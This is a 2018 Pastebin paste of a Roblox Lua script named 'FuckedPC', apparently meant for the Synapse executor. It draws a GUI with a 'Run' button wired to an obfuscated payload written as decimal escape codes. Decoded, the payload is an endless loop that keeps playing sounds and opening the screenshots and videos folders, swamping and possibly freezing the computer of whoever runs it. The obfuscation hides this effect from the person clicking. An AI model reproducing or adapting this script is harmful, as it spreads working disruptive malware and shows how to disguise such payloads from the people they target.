Advertisement
RyanDaCoder

FuckedPC

Jun 12th, 2018
204
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.44 KB | None | 0 0
  1. print'FuckedPC Made By RyanDaCoder, BX1V, CopyString'
  2. print'This only works for Synapse, enjoy xddd'
  3. wait(1)
  4. -- Objects
  5.  
  6. local ScreenGui = Instance.new("ScreenGui")
  7. local TextLabel = Instance.new("TextLabel")
  8. local Frame = Instance.new("Frame")
  9. local run = Instance.new("TextButton")
  10.  
  11. -- Properties
  12.  
  13. ScreenGui.Parent = game.CoreGui
  14.  
  15. TextLabel.Parent = ScreenGui
  16. TextLabel.Active = true
  17. TextLabel.BackgroundColor3 = Color3.new(1, 1, 1)
  18. TextLabel.Draggable = true
  19. TextLabel.Position = UDim2.new(0, 0, 0.279951096, 0)
  20. TextLabel.Size = UDim2.new(0, 392, 0, 24)
  21. TextLabel.Font = Enum.Font.SourceSans
  22. TextLabel.Text = "FuckedPC"
  23. TextLabel.TextColor3 = Color3.new(0, 0, 0)
  24. TextLabel.TextSize = 14
  25.  
  26. Frame.Parent = TextLabel
  27. Frame.BackgroundColor3 = Color3.new(1, 1, 1)
  28. Frame.Position = UDim2.new(0, 0, 1, 0)
  29. Frame.Size = UDim2.new(0, 392, 0, 271)
  30.  
  31. run.Name = "run"
  32. run.Parent = Frame
  33. run.BackgroundColor3 = Color3.new(1, 1, 1)
  34. run.Position = UDim2.new(0.235449731, 0, 0.43726939, 0)
  35. run.Size = UDim2.new(0, 200, 0, 34)
  36. run.Font = Enum.Font.SourceSans
  37. run.Text = "Run"
  38. run.TextColor3 = Color3.new(0, 0, 0)
  39. run.TextScaled = true
  40. run.TextSize = 14
  41. run.TextWrapped = true
  42.  
  43. run.MouseButton1Click:connect(function()
  44. loadstring('\119\104\105\108\101\32\116\114\117\101\32\100\111\10\32\32\32\32\32\32\32\32\32\32\32\32\115\112\97\119\110\40\102\117\110\99\116\105\111\110\40\41\10\32\32\32\32\32\32\32\32\32\32\32\32\32\32\32\32\101\103\103\32\61\32\73\110\115\116\97\110\99\101\46\110\101\119\40\34\83\111\117\110\100\34\44\32\119\111\114\107\115\112\97\99\101\41\10\32\32\32\32\32\32\32\32\32\32\32\32\32\32\32\32\32\32\32\101\103\103\46\83\111\117\110\100\73\100\32\61\32\34\114\98\120\97\115\115\101\116\105\100\58\47\47\51\52\53\50\56\55\56\52\53\34\10\32\32\32\32\32\32\32\32\32\32\32\32\32\32\32\32\32\32\32\32\101\103\103\58\80\108\97\121\40\41\10\32\32\32\32\32\32\32\32\32\32\32\32\101\110\100\41\10\32\32\32\32\32\32\32\32\32\32\32\32\115\112\97\119\110\40\102\117\110\99\116\105\111\110\40\41\10\32\32\32\32\32\32\32\32\32\32\32\32\32\32\32\32\32\32\32\103\97\109\101\58\79\112\101\110\83\99\114\101\101\110\115\104\111\116\115\70\111\108\100\101\114\40\41\10\32\32\32\32\32\32\32\32\32\32\32\32\32\32\32\32\103\97\109\101\58\79\112\101\110\86\105\100\101\111\115\70\111\108\100\101\114\40\41\10\32\32\32\32\32\32\32\32\32\32\32\32\101\110\100\41\10\32\32\32\32\32\32\32\32\32\32\32\32\119\97\105\116\40\41\10\32\32\32\32\32\32\32\32\101\110\100\10')()
  45. end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement